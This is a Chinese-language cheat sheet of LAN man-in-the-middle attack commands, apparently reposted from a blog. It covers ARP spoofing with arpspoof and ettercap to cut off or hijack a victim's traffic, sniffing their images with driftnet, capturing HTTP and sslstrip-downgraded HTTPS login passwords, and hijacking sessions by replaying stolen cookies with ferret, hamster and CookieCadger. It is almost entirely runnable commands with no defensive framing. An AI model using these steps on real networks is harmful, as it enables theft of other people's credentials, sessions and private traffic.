1.檢視區域網路中的主機
fping –asg 192.168.1.0/24
2.斷網
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
(arpspoof -i 網卡 -t 目标IP 網關)
3.流量劫持
echo 1 >/proc/sys/net/ipv4/ip_forward
(echo空格1空格>)
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
4.圖檔嗅探
(1)方法1(實驗不成功)
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
driftnet -i wlan0
(原因分析:可能丢包原因吧)
(2)方法2(成功)
sudo ettercap -i wlan0 -T -M arp:remote /192.168.1.253//192.168.1.100/
driftnet -i wlan0
(圖檔檔案夾:/tmp/driftnet)
(
Ubuntu下可以安裝工具:
sudo apt-get install ettercap-text-only
sudo apt-get install driftnet
)
5.http登入賬号密碼嗅探
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
ettercap -Tq -i wlan0
(資訊太龐雜,可以使用 ettercap -Tq -i wlan0 >test友善查找)
6.https登入賬号密碼嗅探
vim /etc/ettercap.conf
将
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
修改為
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
sslstrip -a -f -k
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
ettercap -Tq -i wlan0
7.會話劫持
(1)方法1
arpspoof
wireshark -->抓包
ferret --。重新生成抓包後的檔案
hamster -- > 重放流量
$echo 1 >/proc/sys/net/ipv4/ip_forward
$arpspoof -i wlan0 -t 192.168.100 192.168.1.1
$wireshark
wireshark 儲存為.pcap檔案
$ferret -r cookie.pcap
将生成的txt檔案放到使用者目錄下
$hamster
配置代理
通路127.0.0.1:1234(上一步的代理)
(2)方法2
$echo 1 >/proc/sys/net/ipv4/ip_forward
$arpspoof -i wlan0 -t 192.168.100 192.168.1.1
$ferret -i wlan0
$hamster
(3)方法3
$echo 1 >/proc/sys/net/ipv4/ip_forward
$arpspoof -i wlan0 -t 192.168.100 192.168.1.1
CookieCadger-1.08.jar
轉載于:https://www.cnblogs.com/yaolei/p/4763334.html
![Eclipse搭建Web Service服務[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)